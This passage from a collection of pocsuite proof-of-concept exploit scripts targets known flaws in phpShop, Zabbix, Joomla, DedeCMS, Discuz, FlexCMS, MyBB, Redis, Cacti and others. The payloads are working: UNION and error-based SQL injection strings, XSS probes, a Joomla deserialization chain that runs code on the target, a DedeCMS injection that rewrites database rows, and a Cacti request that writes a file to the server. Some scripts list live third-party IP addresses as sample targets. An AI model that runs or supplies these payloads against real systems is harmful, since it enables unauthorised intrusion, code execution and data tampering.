        """Send the UNION payload and look for the concatenated token."""
        # NOTE: the path contains a literal space ('/phpshop 2.0/'); the HTTP
        # layer is relied on to percent-encode it.
        injected = "/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,CONCAT(0x7162787671,0x50664e68584e4c584352,0x716a717171),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --"
        full_url = self.url + injected
        body = req.get(full_url, headers=self.headers, timeout=10).content

        found = {}
        if re.search(self._TOKEN, body):
            found['VerifyInfo'] = {'URL': full_url}
        return self.parse_attack(found)

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if not result:
            output.fail('Internet Nothing returned')
            return output
        output.success(result)
        return output
49 |
50 | register(TestPOC)
--------------------------------------------------------------------------------
/_170826_Zabbix_303_SQL_Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
8 |
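class TestPOC(POCBase):
    """Zabbix 2.2.x/3.0.x error-based SQL injection in ``jsrpc.php`` (profileIdx2)."""
    vulID = '00004'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-26'
    createDate = '2017-08-26'
    updateDate = '2017-08-26'
    references = ['http://www.freebuf.com/vuls/112197.html']
    name = 'Zabbix SQl 注入漏洞 PoC'
    appPowerLink = 'https://www.zabbix.com'
    appName = 'Zabbix'
    appVersion = '3.0.3'
    vulType = 'SQL Injection'
    desc = '''
    Zabbix 2.2.x和3.0.x版本中存在两处基于错误回显的SQL注入漏洞
    '''
    # NOTE(review): this is a live third-party address, not a lab host.
    samples = ['http://89.239.138.140:5001/']

    # Single quote appended to profileIdx2 triggers the error-based injection.
    # The ``sid`` value is hard-coded; whether the endpoint needs a valid one
    # is not established here.
    # The original copy of this string read ``&times;tamp=`` (``&timestamp``
    # mangled into the HTML entity for '×'), which sent a garbage parameter;
    # restored to ``&timestamp=``.
    _PAYLOAD = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"

    def _verify(self):
        """Send the payload and look for a MySQL syntax error in the reply.

        The marker is MySQL's error text, so a Zabbix instance backed by
        another database would not be detected even if it is vulnerable.
        """
        result = {}
        payload = self._PAYLOAD  # the original had a stray ``payload = payload =`` double assignment
        att_url = self.url + payload
        response = req.get(att_url)
        if "You have an error in your SQL syntax" in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output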
48 |
49 |
50 | register(TestPOC)
51 |
--------------------------------------------------------------------------------
/FlexCMS 2.5 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
class TestPOC(POCBase):
    """FlexCMS 2.5 reflected XSS in ``inc-core-admin-editor-previouscolorsjs.php`` (SSV-85553).

    Only exploitable when ``register_globals`` is on (see ``desc``); the probe
    injects a ``<script>`` via ``PreviousColorsString`` and checks that it is
    reflected unencoded.
    """
    vulID = 'SSV-85553'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2008-08-15'
    createDate = '2015-10-17'
    updateDate = '2015-10-17'
    references = ['https://www.exploit-db.com/exploits/32254/']
    name = "FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability"
    appPowerLink = 'http://www.flexcms.com/'
    appName = 'FlexCMS'
    appVersion = '2.5'
    vulType = 'XSS'
    desc = '''
    FlexCMS是一套网站内容管理系统。
    FlexCMS 2.5以及之前的版本中的inc-core-admin-editor-previouscolorsjs.php存在跨站脚本攻击漏洞,
    当register_globals选项被激活时,远程攻击者可以借助reviousColorsString参数,
    注入任意的web脚本或HTML。
    '''
    # the sample sites for examine
    samples = ['']

    # URL-encoded <script>alert(/SebugTest/)</script>.
    _PAYLOAD = "/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=%3Cscript%3Ealert(/SebugTest/)%3C/script%3E"
    # A literal '>' right before the call means the tag came back unencoded.
    _REFLECTED = '>alert(/SebugTest/)'

    def _verify(self):
        """Request the page with the script payload and classify the reply."""
        reply = req.get(urljoin(self.url, self._PAYLOAD), timeout=5)
        return self.parse_verify(reply)

    def parse_verify(self, res):
        """Success when the payload is reflected with its closing '>' intact."""
        output = Output(self)
        if self._REFLECTED not in res.content:
            output.fail('Internet Nothing returned')
            return output
        output.success({'VerifyInfo': {'URL': self.url}})
        return output

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()
49 |
50 | register(TestPOC)
--------------------------------------------------------------------------------
/FotoWeb 6.0 Login.fwx s Parameter XSS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
class TestPOC(POCBase):
    """FotoWeb 6.0 reflected XSS in ``cmdrequest/Login.fwx`` ``s`` parameter (CVE-2009-0573)."""
    vulID = 'SSV-86055'  # vul ID
    version = '1'
    author = 'hhxx'
    vulDate = '2009-02-09'
    createDate = '2015-10-22'
    updateDate = '2015-10-22'
    references = ['https://www.exploit-db.com/exploits/32782/']
    name = "FotoWeb 6.0 Login.fwx s Parameter XSS"
    appPowerLink = 'www.fotoware.com'
    appName = 'FotoWeb'
    appVersion = '6.0'
    vulType = 'XSS'
    desc = '''
    FotoWeb 是针对网站发布内容包括文档、图片、pdf、视频等实现归档的工具。
    FotoWeb 6.0 (Build 273)版本中存在多个跨站脚本攻击漏洞。
    远程攻击者可以借助(1)对cmdrequest/Login.fwx的s参数和(2)对Grid.fwx的搜索参数,
    注入任意web脚本或HTML。
    CVEID:CVE-2009-0573
    CNNVDID:CNNVD-200902-327
    '''
    # the sample sites for examine
    samples = ['']

    # NOTE(review): the script element of the payload has been stripped from
    # this copy -- only the attribute-closing '">' survives -- while the marker
    # below still expects ``alert(/Sebug23333Test/)``.  As written the probe
    # injects nothing and can never report a hit; restore the payload before use.
    _PAYLOAD = '/fotoweb/cmdrequest/Login.fwx?s=">'
    _REFLECTED = '>alert(/Sebug23333Test/)'

    def _verify(self):
        """Request Login.fwx with the payload in ``s`` and classify the reply."""
        reply = req.get(urljoin(self.url, self._PAYLOAD), timeout=5)
        return self.parse_verify(reply, self._PAYLOAD, 'xss')

    def parse_verify(self, res, payload, type):
        """Success when the marker is reflected unencoded.

        Args:
            res: HTTP response for ``payload``.
            payload: path+query that was requested; echoed in the result URL.
            type: check kind; only 'xss' is handled.
        """
        output = Output(self)
        hit = type == 'xss' and self._REFLECTED in res.content
        if not hit:
            output.fail('Internet Nothing returned')
            return output
        # The page echoed our marker verbatim, so the injection landed.
        output.success({'VerifyInfo': {'URL': urljoin(self.url, payload)}})
        return output

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()
52 |
53 | register(TestPOC)
--------------------------------------------------------------------------------
/Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from urlparse import urljoin
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 |
9 |
class TestPOC(POCBase):
    """Enorth Webpublisher CMS Oracle error-based SQL injection (SSV-89306).

    ``delete_pending_news.jsp?cbNewsId=`` is injected with a ``ctxsys.drithsx.sn``
    call whose error message echoes ``md5('3.14')``; that digest in the
    response proves the expression was evaluated by the database.
    """
    vulID = '89306'  # vul ID
    version = '1'
    author = ['cnyql']
    vulDate = '2015-09-02'
    createDate = '2015-09-02'
    updateDate = '2015-09-12'
    references = ['http://www.sebug.net/vuldb/ssvid-89306']
    name = 'Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp'
    appPowerLink = 'http://webpublisher.enorth.com.cn/'
    appName = 'Enorth Webpublisher CMS'
    appVersion = 'unknown'
    vulType = 'SQL Injection'
    desc = '''
    Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users.
    '''

    # ORACLE ERROR BASED INJ.  Relative path: urljoin() replaces the last
    # segment of self.url, so a base URL without a trailing slash loses it.
    _PAYLOAD = "pub/m_pending_news/delete_pending_news.jsp?cbNewsId=1)%20and%201=ctxsys.drithsx.sn(1,(Utl_Raw.Cast_To_Raw(sys.dbms_obfuscation_toolkit.md5(input_string => '3.14'))))?"
    # Expected digest of the string '3.14' as produced by the injected call.
    _DIGEST = '4beed3b9c4a886067de0e3a094246f78'

    def _verify(self):
        """Send the injection and classify the reply."""
        reply = req.get(urljoin(self.url, self._PAYLOAD), timeout=5)
        return self.parse_verify(reply, self._PAYLOAD)

    def parse_verify(self, res, payload):
        """Success when the digest is echoed back in the response body."""
        output = Output(self)
        if self._DIGEST not in res.content:
            output.fail('Internet Nothing returned')
            return output
        output.success({'VerifyInfo': {'URL': urljoin(self.url, payload)}})
        return output
47 |
48 |
49 | register(TestPOC)
50 |
--------------------------------------------------------------------------------
/_170826_Joomla_345_RCE.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
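class TestPOC(POCBase):
    """Joomla 3.4.5 session-unserialize RCE (CVE-2015-8562).

    A serialized object graph is smuggled in the User-Agent header; when Joomla
    unserializes the stored session the SimplePie gadget calls
    ``cache_name_function`` (``assert``) on ``feed_url``, i.e. it runs
    ``phpinfo();`` on the target.  Note that "verify" therefore executes code
    on the target, not just a probe.
    """
    vulID = '00003'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-26'
    createDate = '2017-08-26'
    updateDate = '2017-08-26'
    references = ['http://cxsecurity.com/cveshow/CVE-2015-8562/']
    name = 'Joomla 反序列化漏洞 PoC'
    appPowerLink = 'https://www.joomla.org'
    appName = 'Joomla'
    appVersion = '3.4.5'
    vulType = 'RCE'
    desc = '''
    漏洞存在于反序列化session的过程中
    '''
    samples = ['']

    # Trailing \xF0\x9D\x8C\x86 is a 4-byte UTF-8 character; presumably it
    # truncates the stored session (MySQL 3-byte utf8) right after the payload.
    _PAYLOAD = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'

    def _verify(self):
        """Send the payload once and look for phpinfo() output.

        The original used ``timeout=1``, which on a slow host times out before
        phpinfo() renders and yields a false negative; 10s matches the other
        PoCs in this collection.
        NOTE(review): the author left a second request commented out
        (``response2 = req.get(self.url)``).  If the injected session is only
        unserialized on the *next* request, a second GET is needed for the
        marker to appear -- confirm against a test instance.
        """
        result = {}
        payload = self._PAYLOAD
        headers = {'User-Agent': payload}
        response = req.get(self.url, headers=headers, timeout=10)
        # phpinfo() output lists _SERVER["REMOTE_ADDR"].
        if 'SERVER["REMOTE_ADDR"]' in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output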
46 | register(TestPOC)
--------------------------------------------------------------------------------
/Discuz! Plugin JiangHu _= 1.1 (id) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | import re
8 |
class TestPOC(POCBase):
    """Discuz! JiangHu Inn plugin <= 1.1 union-based SQL injection (SSV-12193).

    The injected ``concat`` of three hex literals decodes to
    ``qbxvq`` + ``PfNhXNLXCR`` + ``qjqqq``; seeing that token in the page proves
    the injected column was rendered.
    """
    vulID = 'SSV-12193'  # vul ID
    version = '1'
    author = ['hh']
    vulDate = '2009-09-02'
    createDate = '2015-10-21'
    updateDate = '2015-10-21'
    references = ['https://www.exploit-db.com/exploits/9576/']
    name = 'Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability'
    appPowerLink = 'www.discuz.net'
    appName = 'Discuz! Plugin JiangHu Inn'
    appVersion = '1.1'
    vulType = 'SQL Injection'
    desc = '''
    Discuz!中的JiangHu Inn plugin 1.1及其早期版本中存在SQL注入漏洞,
    远程攻击者可以借助 forummission.php的显示操作中的id参数执行任意SQL指令。
    d0rk : inurl:forummission.php
    '''
    # the sample sites for examine
    samples = ['']

    # Hex 0x7162787671 / 0x50664e68584e4c584352 / 0x716a717171 concatenated.
    _TOKEN = 'qbxvqPfNhXNLXCRqjqqq'

    def _verify(self):
        """Send the UNION payload against ``id`` and look for the token."""
        injected = "/forummission.php?index=show&id=24 and+1=2+union+select+1,2,concat(0x7162787671,0x50664e68584e4c584352,0x716a717171),4,5,6,7,8,9,10,11 from cdb_members--"
        full_url = self.url + injected
        body = req.get(full_url, headers=self.headers, timeout=10).content

        found = {}
        # The token only appears if concat() ran inside the query.
        if re.search(self._TOKEN, body):
            found['VerifyInfo'] = {'URL': full_url}
        return self.parse_attack(found)

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if not result:
            output.fail('Internet Nothing returned')
            return output
        output.success(result)
        return output
52 |
53 | register(TestPOC)
--------------------------------------------------------------------------------
/MyBB 1.6.5 suffers from a cross site scripting vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
8 | import requests
9 |
10 | '''
11 | 原始利用链接:
12 | /tags.php?tag=">
13 | '''
14 |
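class TestPOC(POCBase):
    """MyBB 1.6.5 reflected XSS in ``tags.php?tag=`` (SSV-26119)."""
    vulID = '26119'  # ssvid
    version = '1.0'
    author = ['XXXX']
    vulDate = ''
    createDate = '2016-01-25'
    updateDate = '2016-01-25'
    references = ['http://www.seebug.org/vuldb/ssvid-26119']
    name = 'MyBB 1.6.5 suffers from a cross site scripting vulnerability'
    appPowerLink = 'http://www.mybboard.net/'
    appName = 'MyBB'
    appVersion = '1.6.5'
    vulType = 'XSS'
    desc = '''
    MyBB 1.6.5 tags.php 存在跨站脚本漏洞
    '''
    samples = ['']

    # What must come back unescaped for the XSS to count.  The author's notes
    # say prompt(/SEBUG@TEST/) was chosen over prompt("SEBUG@TEST") because
    # some sites escape double quotes.  The original tested ``'' in r.content``,
    # which is always true and flagged every reachable host.
    _XSS_MARKER = 'prompt(/SEBUG@TEST/)'

    def _verify(self):
        """Request tags.php with the payload and look for the reflected marker.

        NOTE(review): the script element of the payload was stripped from this
        copy of the file (only the attribute-closing '">' survives), so the
        request no longer injects anything and cannot produce a hit until the
        payload is restored.
        """
        result = {}

        # rstrip('/') normalises the base URL so we never build '//tags.php'.
        vulurl = self.url.rstrip('/') + '/tags.php?tag=">'

        # 15s timeout and no certificate validation, as in the original.
        # verify=False means an on-path attacker can feed us any body; it is
        # tolerable for a scanner probe but never copy this into client code.
        # The original wrapped this in ``except Exception, e: raise e``, which
        # only discarded the traceback; letting errors propagate is equivalent.
        r = requests.get(vulurl, timeout=15, verify=False)
        if self._XSS_MARKER in r.content:
            result['XSSInfo'] = {}
            result['XSSInfo']['URL'] = r.url

        return self.parse_output(result)

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()

    def parse_output(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output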
63 |
64 | register(TestPOC)
--------------------------------------------------------------------------------
/Apple Macintosh OS X .DS_Store 信息泄露漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 |
9 | from ds_store import DSStore
10 |
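class TestPOC(POCBase):
    """Exposed ``.DS_Store`` file: fingerprint it and list the filenames it records."""
    vulID = '1729'  # vul ID
    version = '1'
    author = ['ricter']
    vulDate = '2015-03-09'
    createDate = '2015-03-09'
    updateDate = '2015-03-09'
    references = ['http://www.securityfocus.com/bid/3324/discuss']
    name = 'Apple Macintosh OS X .DS_Store Information Disclosure'
    appPowerLink = 'http://www.apple.com'
    appName = 'Apple Macintosh OS X'
    appVersion = 'all version'
    vulType = 'Information Disclosure'
    desc = '''
    在开发过程中开发者可能会把 .DS_Store 文件上传到网站上导致
    信息泄露漏洞。
    '''

    samples = ['']
    install_requires = ['ds_store==1.0.1']

    # .DS_Store files begin with 0x00000001 followed by the magic "Bud1".
    _MAGIC = b'\x00\x00\x00\x01\x42\x75\x64\x31'

    def _attack(self):
        """Attack mode is the same read as verify mode."""
        return self._verify()

    def _verify(self):
        """Fetch ``/.DS_Store``; on a magic match, parse it and collect filenames.

        The magic check alone decides vulnerable/not; parsing only enriches the
        result, so a parse failure is printed and the hit is still reported
        (with an empty file list), as in the original.
        """
        from io import BytesIO  # parse the downloaded body in memory
        result = {}
        url = '%s/.DS_Store' % self.url
        response = req.get(url).content
        filelist = []
        if self._MAGIC in response:
            try:
                # The original passed the raw body to DSStore.open() as if it
                # were a *filename*, so parsing always failed and the file list
                # was always empty.  DSStore.open() also accepts a file-like
                # object, which is what we give it here.
                with DSStore.open(BytesIO(response), 'r+') as store:
                    for entry in store:
                        filelist.append(entry.filename)
            except Exception as e:
                print('[-] Error: %s' % str(e))
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = url
            # Sorted, de-duplicated list instead of a set: deterministic output
            # and serialisable by whatever renders the result.
            result['FileInfo']['Content'] = sorted(set(filelist))

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output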
60 |
61 |
62 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Spider Calendar _= 3.2.6 - SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
5 |
6 | from pocsuite.net import req
7 |
8 | from pocsuite.poc import Output, POCBase
9 |
10 | from pocsuite.utils import register
11 |
12 |
13 |
class TestPOC(POCBase):
    """Joomla Spider Calendar <= 3.2.6 error-based SQL injection in ``calendar_id`` (SSV-87242).

    ``||exp(~(select ...))`` forces a MySQL DOUBLE overflow whose error message
    echoes the inner subquery result, here ``md5(456546)``.
    """
    vulID = '87242'
    version = '1'
    vulDate = '2014-08-31'
    author = 'anonymous'
    createDate = '2015-09-30'
    updateDate = '2015-09-30'
    references = ['http://www.sebug.net/vuldb/ssvid-87242']
    name = 'Joomla Spider Calendar SQL Injection'
    appPowerLink = 'http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329'
    appName = 'Joomla Spider Calendar Component'
    appVersion = '<= 3.2.6'
    vulType = 'SQL Injection'
    desc = 'Joomla Spider Calendar Component SQL Injection in index.php, calendar_id param'
    samples = ['']

    _INJECTION = '||exp(~(select*from(select md5(456546))a))'
    _BASE = '%s/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1'
    # Digest expected in the error message when the subquery is evaluated.
    _DIGEST = 'e02f052b7d3db73f99d4f5801f2b6fff'

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()

    def _verify(self, verify=True):
        """Append the injection to calendar_id and look for the echoed digest.

        Args:
            verify: unused; kept for interface compatibility.
        """
        vul_url = self._BASE % self.url
        body = req.get(vul_url + self._INJECTION).content

        found = {}
        if self._DIGEST in body:
            found['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(found)

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if not result:
            output.fail('failed')
            return output
        output.success(result)
        return output
93 |
94 | register(TestPOC)
--------------------------------------------------------------------------------
/_170815_Redis_all_unauthorized.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import socket
5 | import urlparse
6 | from pocsuite.utils import register
7 | from pocsuite.poc import Output, POCBase
8 |
9 |
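class TestPOC(POCBase):
    """Redis unauthenticated access: send ``INFO`` and look for ``redis_version``."""
    vulID = '00002'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-15'
    createDate = '2017-08-15'
    updateDate = '2017-08-15'
    references = [
        'http://blog.knownsec.com/2015/11/\
analysis-of-redis-unauthorized-of-expolit/']
    name = 'Redis 未授权访问'
    appPowerLink = 'https://www.redis.io'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized'
    desc = '''
    redis 默认没有开启相关认证,黑客直接访问即可获取数据库中所有信息。
    '''
    # NOTE(review): a live third-party address, and a bare host -- the form the
    # original URL parsing could not handle (see _target).
    samples = ['128.36.23.111']

    # RESP encoding of "*1\r\n$4\r\ninfo\r\n": the INFO command, no arguments.
    _INFO_CMD = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
    _DEFAULT_PORT = 6379
    _TIMEOUT = 4

    def _target(self):
        """Return ``(host, port)`` parsed from ``self.url``.

        Accepts ``host``, ``host:port`` and ``scheme://host[:port]/...``.
        The original did ``self.url.split(':')[1]``, which turned a bare
        ``host:port`` into host='port' and raised IndexError on a bare host
        (exactly the form used in ``samples``).

        Raises:
            ValueError: if no host can be extracted.
        """
        url = self.url.strip()
        # urlparse only populates netloc when the string contains '//'.
        if '://' not in url:
            url = '//' + url
        parsed = urlparse.urlparse(url)
        host = parsed.hostname
        if not host:
            raise ValueError('cannot extract a host from %r' % self.url)
        return host, parsed.port or self._DEFAULT_PORT

    def _verify(self):
        """Connect, send INFO, and report a hit if the server answers with its report.

        A server with ``requirepass`` set typically answers ``-NOAUTH ...``
        instead, which does not contain ``redis_version``.
        """
        result = {}
        try:
            host, port = self._target()
            sock = socket.socket()
            # Per-socket timeout.  The original called
            # socket.setdefaulttimeout(4) *after* creating the socket, so this
            # socket blocked forever on connect/recv while the process-wide
            # default was silently changed for every later socket.
            sock.settimeout(self._TIMEOUT)
            try:
                sock.connect((host, port))
                sock.sendall(self._INFO_CMD)
                data = sock.recv(1024)
            finally:
                sock.close()
            if data and b'redis_version' in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url
                result['VerifyInfo']['port'] = port
                result['VerifyInfo']['result'] = data[:20]
        except Exception as e:
            # Best-effort, as in the original: network errors are printed, not raised.
            print(e)
        return self.parse_attack(result)

    def _attack(self):
        """Attack mode is the same probe as verify mode."""
        return self._verify()

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("someting error")
        return output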
64 |
65 |
66 | register(TestPOC)
67 |
--------------------------------------------------------------------------------
/dede_guestbook_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 | import sys
5 | from bs4 import BeautifulSoup
6 |
7 | from pocsuite.net import req
8 | from pocsuite.poc import POCBase,Output
9 | from pocsuite.utils import register
10 |
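class Fuckdede(POCBase):
    """DedeCMS 5.7 ``plus/guestbook.php`` SQL injection via ``editok``.

    WARNING: this is not a passive check.  The payload rewrites the ``msg``
    column of an existing guestbook entry with the output of MySQL ``user()``
    on the target, so even a "verify" run modifies the target's data
    (``_attack`` is the very same call).
    """
    vulID = '2'
    version = '1'
    author = ['fengxuan']
    vulDate = '2016-2-13'
    createDate = '2016-2-13'
    updateDate = '2016-2-13'
    references = ['http://www.evalshell.com', 'http://www.moonsec.com/post-13.html']
    name = 'dedecms plus/guestbook.php 注入漏洞利用EXP'
    appPowerLink = 'http://www.dedecms.cn/'
    appName = 'dedecms'
    appVersion = '5.7'
    vulType = 'SQL Injection'
    desc = '''
    开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
    带入了SQL语句中,可以通过\字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
    此注入为报错注入,可以通过UpdateXML函数进行注入。
    '''
    samples = ['']

    @staticmethod
    def _find_msgid(html):
        """Return the ``id`` of the first ``guestbook.php?action=admin`` link, or None.

        The original sliced the href at a fixed offset (``[30:]``, the length of
        ``guestbook.php?action=admin&id=``); the regex gives the same id for
        that layout and tolerates other parameter orders.  Anchors without an
        href (which made the original raise AttributeError) are skipped.
        """
        soup = BeautifulSoup(html, 'lxml')
        for anchor in soup.findAll('a'):
            href = anchor.get('href') or ''
            if href.startswith('guestbook.php?action=admin'):
                match = re.search(r'[?&]id=(\d+)', href)
                if match:
                    return match.group(1)
        return None

    def _verify(self):
        """Pick an entry, inject ``user()`` into its msg, re-read the page.

        Fixes relative to the original: bail out when no entry is found (it
        printed a message and then sent ``id=None`` anyway); actually send the
        payload (it fetched the guestbook page a second time instead); and
        re-parse the post-exploit page (it searched the pre-exploit soup).
        """
        result = {}
        target = self.url + "/plus/guestbook.php"
        msgid = self._find_msgid(req.get(target).content)
        if msgid is None:
            print("No msgid found, nothing to inject into")
            return self.parse_result(result)

        # The quote closes the msg value; ``,msg=user(),email='`` rides along
        # on the UPDATE and stores the DB user into the visible message.
        payload = self.url + "/plus/guestbook.php?action=admin&job=editok&id={0}&msg=',msg=user(),email='".format(msgid)
        req.get(payload)

        after = BeautifulSoup(req.get(target).content, 'lxml')
        for cell in after.findAll('td', attrs={'class': 'msgtd'}):
            # user() is 'name@host'; '@localhost' shows up when MySQL is local.
            if '@localhost' in cell.text:
                result = {'VerifyInfo': {}}
                result['VerifyInfo']['URL'] = self.url
                break
        return self.parse_result(result)

    def _attack(self):
        """Attack mode is the same (data-modifying) request as verify mode."""
        return self._verify()

    def parse_result(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail("Internet Nothing returned")
        return output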
66 |
67 | register(Fuckdede)
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/_170812_Cacti_all_file_upload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
8 |
class TestPOC(POCBase):
    """pocsuite PoC: file write through the Cacti WeatherMap plugin editor."""
    # PoC metadata read by the pocsuite framework.
    vulID = '00001'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-12'
    createDate = '2017-08-12'
    updateDate = '2017-08-12'
    references = ['http://www.wooyun.org/bugs/wooyun-2010-0179762']
    name = 'Cacti WeatherMap插件漏洞 PoC'
    appPowerLink = 'https://www.cacti.com'
    appName = 'Cacti'
    appVersion = 'All'
    vulType = 'File Upload'
    desc = '''
Cacti 的 weathermap 插件,可写入任意文件
'''
    samples = ['http://202.29.104.34']

    def _verify(self):
        """Ask editor.php to save map properties under mapname=test.php, then fetch configs/test.php."""
        result = {}
        # One string literal continued with backslash-newline. The map_title value doubles as the
        # marker searched for below.
        # NOTE(review): "¶m=¶m2=" looks like an HTML-entity (&para) mangling of "&param=&param2=" — confirm against the original.
        payload = '/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=\
&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=\
&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=\
Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7'
        vulurl = self.url + payload
        verurl = self.url + '/plugins/weathermap/configs/test.php'
        # Intended to make the editor persist configs/test.php on the target; nothing here removes it afterwards.
        req.get(vulurl)
        req_ver = req.get(verurl)
        # Success = the saved file is served back and contains the map_title marker.
